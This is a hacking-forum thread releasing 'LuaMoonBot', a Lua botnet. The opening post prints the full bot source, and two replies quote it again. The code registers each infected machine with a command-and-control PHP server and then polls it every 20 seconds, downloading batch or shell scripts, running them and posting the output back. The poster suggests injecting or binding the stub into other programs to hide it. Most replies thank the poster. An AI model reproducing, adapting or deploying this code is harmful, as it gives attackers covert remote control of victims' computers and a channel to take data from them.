ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 10436

[OpenSource Release] LuaMoonBot - Lua based botnet

by 991z3r0 - 08-16-2017 - 07:27 PM
#1
I take no credit for this software!

LuaMoonBot is a open source botnet I developed in lua the entire bot is a single lua file that adapts itself upon execution if the system is on windows/linux/mac.

The lua botnet can be compiled on any OS windows-mac-linux as the builder can be run from wine. The actual target bot stub can also be compiled to any OS binary.

The website control point allows you to send batch code and bash shell code to target systems and read the output of the commands ran.

NOTE - this botnet does not have ANY persistance. It does not add itself to startup or registry its suggested to inject your target stub into another proccess on the system or bind the stub to another program
[Image: imageedit_1_4518827587.png]
[Image: imageedit_3_8901038084.png]
Virus Scan -

https://www.virustotal.com/en/file/4fae0.../analysis/

Download -
http://tmp.www.cryptixhacking.com/LuaMoonBot.zip


Lua Source Code -

Replace -
MYWEBSITE.com/lbot

with your uploaded php file directory.
Code:
-- generate random ID and get current working folder yay
rr = math.randomseed(os.time())
id = math.random()
nid = string.gsub(id, "0.", "", 1)
hostname = murgaLua.getHostOsName()
CurDir = murgaLua_ExePath
Wdir = lfs.currentdir()
nid = string.gsub(id, "0.", "", 1)

-- this section detects if user ran file before and already has a ID if not makes one
if hostname=="windows" then
myID=io.open(Wdir.."\\ID.txt", "r")  
else
myID=io.open(Wdir.."//ID.txt", "r")  
end
if myID==nil then
newuser=true
if hostname=="windows" then
IDfile = io.open(Wdir.."\\ID.txt", "w")
else
IDfile = io.open(Wdir.."//ID.txt", "w")
end
IDfile:write(nid)
IDfile:flush()
IDfile:close()
UID = nid
else
newuser=false
if hostname=="windows" then
pID=io.open(Wdir.."\\ID.txt", "r")  
else
pID=io.open(Wdir.."//ID.txt", "r")  
end
pV = pID:read()  
UID = pV
end

-- this is requirments for socket connection
http = require("socket.http")
ltn12 = require("ltn12")
url = require("socket.url")

-- function for sleep
function wait(waitTime)
   timer = os.time()
   repeat until os.time() > timer + waitTime
end


-- here if the user is new they post there ID to the php if not we get commands
if newuser==true then
local post = "InputID=" .. nid
post = post .. "&InputPCtype=" .. hostname
local response = {}local r, c, h = http.request {    url = "http://www.MYWEBSITE.com/lbot/lbot.php?",    method = "POST",    headers = {        ["content-length"] = #post,        ["Content-Type"] =  "application/x-www-form-urlencoded"    },    source = ltn12.source.string(post),    sink = ltn12.sink.table(response)}
print("UserID",UID)
print("CurDir - ",Wdir)
print("Computer",hostname)
print(response[1])
end
if newuser==false then
while( true )
do
print("UserID",UID)
print("You are not a new user")
if hostname=="windows" then
Dfile = ltn12.sink.file(io.open(Wdir.."\\cmd.bat", 'w'))
else
Dfile = ltn12.sink.file(io.open(Wdir.."//cmd.sh", 'w'))
end
http.request {
   url = 'http://www.MYWEBSITE.com/lbot/'..UID..'/cmd.txt',
   sink = Dfile,
}
if hostname=="windows" then
dcmd=io.popen(Wdir.."\\cmd.bat")  
else
trun=io.popen("chmod 777 "..Wdir.."//cmd.sh")
trun:close()
trun=io.popen("dos2unix "..Wdir.."//cmd.sh")
trun:close()
dcmd=io.popen(Wdir.."//cmd.sh")
end
local rresult = dcmd:read("*a")
dcmd:close()
local post = "InputID=" .. UID
post = post .. "&InputCMD=" .. rresult
local response = {}local r, c, h = http.request {    url = "http://www.MYWEBSITE.com/lbot/pbot.php?",    method = "POST",    headers = {        ["content-length"] = #post,        ["Content-Type"] =  "application/x-www-form-urlencoded"    },    source = ltn12.source.string(post),    sink = ltn12.sink.table(response)}
print(response[1])
wait(20)
end
end

I can not be held liable or responsible for how this program and its source is used. It was created and intended to allow remote computer control of other systems that have granted such access to you for control.
[Image: CNJn1BC.jpg]
Reply
#2
i mean g looks b
Reply
#3
(08-16-2017 - 07:27 PM)991z3r0 Wrote: I take no credit for this software!

LuaMoonBot is a open source botnet I developed in lua the entire bot is a single lua file that adapts itself upon execution if the system is on windows/linux/mac.

The lua botnet can be compiled on any OS windows-mac-linux as the builder can be run from wine. The actual target bot stub can also be compiled to any OS binary.

The website control point allows you to send batch code and bash shell code to target systems and read the output of the commands ran.

NOTE - this botnet does not have ANY persistance. It does not add itself to startup or registry its suggested to inject your target stub into another proccess on the system or bind the stub to another program
[Image: imageedit_1_4518827587.png]
[Image: imageedit_3_8901038084.png]
Virus Scan -

https://www.virustotal.com/en/file/4fae0.../analysis/

Download -
http://tmp.www.cryptixhacking.com/LuaMoonBot.zip


Lua Source Code -

Replace -
MYWEBSITE.com/lbot

with your uploaded php file directory.
Code:
-- generate random ID and get current working folder yay
rr = math.randomseed(os.time())
id = math.random()
nid = string.gsub(id, "0.", "", 1)
hostname = murgaLua.getHostOsName()
CurDir = murgaLua_ExePath
Wdir = lfs.currentdir()
nid = string.gsub(id, "0.", "", 1)

-- this section detects if user ran file before and already has a ID if not makes one
if hostname=="windows" then
myID=io.open(Wdir.."\\ID.txt", "r")  
else
myID=io.open(Wdir.."//ID.txt", "r")  
end
if myID==nil then
newuser=true
if hostname=="windows" then
IDfile = io.open(Wdir.."\\ID.txt", "w")
else
IDfile = io.open(Wdir.."//ID.txt", "w")
end
IDfile:write(nid)
IDfile:flush()
IDfile:close()
UID = nid
else
newuser=false
if hostname=="windows" then
pID=io.open(Wdir.."\\ID.txt", "r")  
else
pID=io.open(Wdir.."//ID.txt", "r")  
end
pV = pID:read()  
UID = pV
end

-- this is requirments for socket connection
http = require("socket.http")
ltn12 = require("ltn12")
url = require("socket.url")

-- function for sleep
function wait(waitTime)
   timer = os.time()
   repeat until os.time() > timer + waitTime
end


-- here if the user is new they post there ID to the php if not we get commands
if newuser==true then
local post = "InputID=" .. nid
post = post .. "&InputPCtype=" .. hostname
local response = {}local r, c, h = http.request {    url = "http://www.MYWEBSITE.com/lbot/lbot.php?",    method = "POST",    headers = {        ["content-length"] = #post,        ["Content-Type"] =  "application/x-www-form-urlencoded"    },    source = ltn12.source.string(post),    sink = ltn12.sink.table(response)}
print("UserID",UID)
print("CurDir - ",Wdir)
print("Computer",hostname)
print(response[1])
end
if newuser==false then
while( true )
do
print("UserID",UID)
print("You are not a new user")
if hostname=="windows" then
Dfile = ltn12.sink.file(io.open(Wdir.."\\cmd.bat", 'w'))
else
Dfile = ltn12.sink.file(io.open(Wdir.."//cmd.sh", 'w'))
end
http.request {
   url = 'http://www.MYWEBSITE.com/lbot/'..UID..'/cmd.txt',
   sink = Dfile,
}
if hostname=="windows" then
dcmd=io.popen(Wdir.."\\cmd.bat")  
else
trun=io.popen("chmod 777 "..Wdir.."//cmd.sh")
trun:close()
trun=io.popen("dos2unix "..Wdir.."//cmd.sh")
trun:close()
dcmd=io.popen(Wdir.."//cmd.sh")
end
local rresult = dcmd:read("*a")
dcmd:close()
local post = "InputID=" .. UID
post = post .. "&InputCMD=" .. rresult
local response = {}local r, c, h = http.request {    url = "http://www.MYWEBSITE.com/lbot/pbot.php?",    method = "POST",    headers = {        ["content-length"] = #post,        ["Content-Type"] =  "application/x-www-form-urlencoded"    },    source = ltn12.source.string(post),    sink = ltn12.sink.table(response)}
print(response[1])
wait(20)
end
end

I can not be held liable or responsible for how this program and its source is used. It was created and intended to allow remote computer control of other systems that have granted such access to you for control.
What exactly does it do?
Reply
#4
(08-19-2017 - 10:04 AM)lonelywolf Wrote:
(08-16-2017 - 07:27 PM)991z3r0 Wrote: I take no credit for this software!

LuaMoonBot is a open source botnet I developed in lua the entire bot is a single lua file that adapts itself upon execution if the system is on windows/linux/mac.

The lua botnet can be compiled on any OS windows-mac-linux as the builder can be run from wine. The actual target bot stub can also be compiled to any OS binary.

The website control point allows you to send batch code and bash shell code to target systems and read the output of the commands ran.

NOTE - this botnet does not have ANY persistance. It does not add itself to startup or registry its suggested to inject your target stub into another proccess on the system or bind the stub to another program
[Image: imageedit_1_4518827587.png]
[Image: imageedit_3_8901038084.png]
Virus Scan -

https://www.virustotal.com/en/file/4fae0.../analysis/

Download -
http://tmp.www.cryptixhacking.com/LuaMoonBot.zip


Lua Source Code -

Replace -
MYWEBSITE.com/lbot

with your uploaded php file directory.
Code:
-- generate random ID and get current working folder yay
rr = math.randomseed(os.time())
id = math.random()
nid = string.gsub(id, "0.", "", 1)
hostname = murgaLua.getHostOsName()
CurDir = murgaLua_ExePath
Wdir = lfs.currentdir()
nid = string.gsub(id, "0.", "", 1)

-- this section detects if user ran file before and already has a ID if not makes one
if hostname=="windows" then
myID=io.open(Wdir.."\\ID.txt", "r")  
else
myID=io.open(Wdir.."//ID.txt", "r")  
end
if myID==nil then
newuser=true
if hostname=="windows" then
IDfile = io.open(Wdir.."\\ID.txt", "w")
else
IDfile = io.open(Wdir.."//ID.txt", "w")
end
IDfile:write(nid)
IDfile:flush()
IDfile:close()
UID = nid
else
newuser=false
if hostname=="windows" then
pID=io.open(Wdir.."\\ID.txt", "r")  
else
pID=io.open(Wdir.."//ID.txt", "r")  
end
pV = pID:read()  
UID = pV
end

-- this is requirments for socket connection
http = require("socket.http")
ltn12 = require("ltn12")
url = require("socket.url")

-- function for sleep
function wait(waitTime)
   timer = os.time()
   repeat until os.time() > timer + waitTime
end


-- here if the user is new they post there ID to the php if not we get commands
if newuser==true then
local post = "InputID=" .. nid
post = post .. "&InputPCtype=" .. hostname
local response = {}local r, c, h = http.request {    url = "http://www.MYWEBSITE.com/lbot/lbot.php?",    method = "POST",    headers = {        ["content-length"] = #post,        ["Content-Type"] =  "application/x-www-form-urlencoded"    },    source = ltn12.source.string(post),    sink = ltn12.sink.table(response)}
print("UserID",UID)
print("CurDir - ",Wdir)
print("Computer",hostname)
print(response[1])
end
if newuser==false then
while( true )
do
print("UserID",UID)
print("You are not a new user")
if hostname=="windows" then
Dfile = ltn12.sink.file(io.open(Wdir.."\\cmd.bat", 'w'))
else
Dfile = ltn12.sink.file(io.open(Wdir.."//cmd.sh", 'w'))
end
http.request {
   url = 'http://www.MYWEBSITE.com/lbot/'..UID..'/cmd.txt',
   sink = Dfile,
}
if hostname=="windows" then
dcmd=io.popen(Wdir.."\\cmd.bat")  
else
trun=io.popen("chmod 777 "..Wdir.."//cmd.sh")
trun:close()
trun=io.popen("dos2unix "..Wdir.."//cmd.sh")
trun:close()
dcmd=io.popen(Wdir.."//cmd.sh")
end
local rresult = dcmd:read("*a")
dcmd:close()
local post = "InputID=" .. UID
post = post .. "&InputCMD=" .. rresult
local response = {}local r, c, h = http.request {    url = "http://www.MYWEBSITE.com/lbot/pbot.php?",    method = "POST",    headers = {        ["content-length"] = #post,        ["Content-Type"] =  "application/x-www-form-urlencoded"    },    source = ltn12.source.string(post),    sink = ltn12.sink.table(response)}
print(response[1])
wait(20)
end
end

I can not be held liable or responsible for how this program and its source is used. It was created and intended to allow remote computer control of other systems that have granted such access to you for control.
What exactly does it do?

It's a basic rough free botnet, if you don't know how to use a botnet i wouldn't recommend using this.
[Image: CNJn1BC.jpg]
Reply
#5
nice release thanks
Reply
#6
This is so cool, definitely going to take a gander bud!

Thank you <3
Reply
#7
Thanks for the release man
Reply
#8
thanks for the release, going to check this out ! :)
Reply
#9
thanks for the release, let's verify this
Reply
#10
nice share lad keep it up
Proud founder & owner of
Reply

Users browsing: 5 Guest(s)